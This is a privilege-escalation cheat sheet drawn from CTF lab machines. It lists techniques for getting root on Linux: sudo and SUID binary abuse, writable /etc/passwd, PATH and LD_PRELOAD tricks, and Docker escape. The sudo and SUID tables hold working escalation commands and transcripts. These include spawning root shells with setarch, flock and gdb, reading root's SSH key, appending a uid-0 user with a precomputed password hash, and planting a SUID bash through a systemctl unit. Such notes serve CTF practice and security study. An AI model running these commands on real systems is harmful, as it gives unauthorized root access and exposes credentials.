The below is a modification from here !
Table of Contents LINUX
- Abusing Sudo Rights
- SUID Bit
- Writable /etc/passwd file
- Python Pickle
- Path Variable
- Docker Escape
- Writable files or script
- Environment Variable
Table of Contents WINDOWS
Abusing Sudo Rights ⤴
| No. | Machine Name | Reference | Files/Binaries | Description |
|---|---|---|---|---|
| 1. | PYEXP: 1 | Reference | Python script | exec function |
| 2. | BaseME | Reference | base64 | base64 to read id_rsa from /root/.ssh/id_rsa |
| 3. | five | Reference | man | man command using Pager of less function. |
| 4. | forbidden | EXTERNAL Reference | setarch | sudo setarch x86_64 /bin/sh |
| 5. | Vulny | EXTERNAL Reference | flock | sudo flock -u / /bin/sh |
| 6. | troya | Reference | insmod | Insert kernel as root for reverse shell |
| 7. | Echoed | No Reference | xdg-open | 1. echo “HackMyVM.eu” > HackMyVM 2. sudo -u root /usr/bin/xdg-open /tmp/HackMyVM 3. Escape shell with after it comes out e.g. WARNING: terminal is not fully functional /tmp/HackMyVM (press RETURN)!/bin/sh |
| 8. | Attack | No Reference | /usr/sbin/cppw | openssl passwd -1 pass123 $1$GLppQ1Z2$VsR0VveK9V3l0Ata6WLCr1 kratos@attack:/home/kratos$ cp /etc/passwd . kratos@attack:/home/kratos$ mv passwd passwd_backup kratos@attack:/home/kratos$ echo "user3:$1$GLppQ1Z2$VsR0VveK9V3l0Ata6WLCr1:0:0::/root:/bin/bash" » passwd_backup kratos@attack:/home/kratos$ sudo -u root /usr/sbin/cppw passwd_backup |
| 9. | Talk | Reference | lynx | sudu -u root /usr/bin/lynx press shift + 1 Spawning your default shell. Use ‘exit’ to return to Lynx. root@talk:/home/nona# whoami;id root |
SUID Bit ⤴
| No. | Machine Name | SUID Bit | Reference | Method | |
|---|---|---|---|---|---|
| 1 | ShellDredd #1 Hannah | cpulimit | Reference | cpulimit -l 50 -f cp /bin/bash /tmp/bash cpulimit -l 50 -f chmod +s /tmp/bash /tmp/bash -p | |
| 2 | hackmyvm : connection | gdb | Reference | gdb -nx -ex ‘python import os; os.execl(“/bin/sh”, “sh”, “-p”)’ -ex quit | a |
| 3 | hackmyvm : soul | agetty | Reference | /sbin/agetty -o -p -l /bin/bash -a root tty | |
| 4 | hackmyvm :Dominator | systemctl | Reference | hans@Dominator:$ nano /tmp/temp.service hans@Dominator:$ cat /tmp/temp.service [Service] Type=oneshot ExecStart=/bin/sh -c “cp /bin/bash /tmp/bash2 && chmod u+s /tmp/bash2” [Install] WantedBy=multi-user.target hans@Dominator:$ /usr/bin/systemctl link /tmp/temp.service hans@Dominator:$ /usr/bin/systemctl enable –now /tmp/temp.service hans@Dominator:~$ /tmp/bash2 -p bash2-5.0# whoami root | |
| 5 | Locker | sulogin | Reference | Environment Variables sulogin looks for the environment variable SUSHELL or sushell to determine what shell to start. If the environment variable is not set, it will try to execute root’s shell from /etc/passwd. If that fails it will fall back to /bin/sh. ┌──(root💀kali)-[/opt/hackmyv/locker] └─# cat exp.c int main() { setuid(0); setgid(0); system(“/bin/bash -p”); } www-data@locker:/tmp$ export SUSHELL=/tmp/exp export SUSHELL=/tmp/exp www-data@locker:/tmp$ chmod 777 exp chmod 777 exp www-data@locker:/tmp$ /usr/sbin/sulogin -e /usr/sbin/sulogin -e Press Enter for maintenance (or press Control-D to continue): root@locker:~# whoami;id whoami;id root uid=0(root) gid=0(root) groups=0(root),33(www-data) |
Writable /etc/passwd file ⤴
| No | Machine Name |
|---|---|
| 1. | PYLINGTON1 |
Writable file or script ⤴
| No | Machine Name |
|---|---|
| 1. | suidy |
Python Pickle ⤴
| No | Machine Name |
|---|---|
| 1. | PHINEAS:1 |
Path Variable ⤴
| No. | Machine Name | comments |
|---|---|---|
| 1. | Hacksudo:search | install: missing file operand |
| 2. | hommie | cat: not absolute file path |
Docker Escape ⤴
| No | Machine Name |
|---|---|
| 1. | pwned |
Enviroment variable ⤴
| No. | Machine Name | comments |
|---|---|---|
| 1. | icarus | LD_PRELOAD |
Service ⤴
| No. | Machine Name | service exploit |
|---|---|---|
| 1. | driver | spoolsv |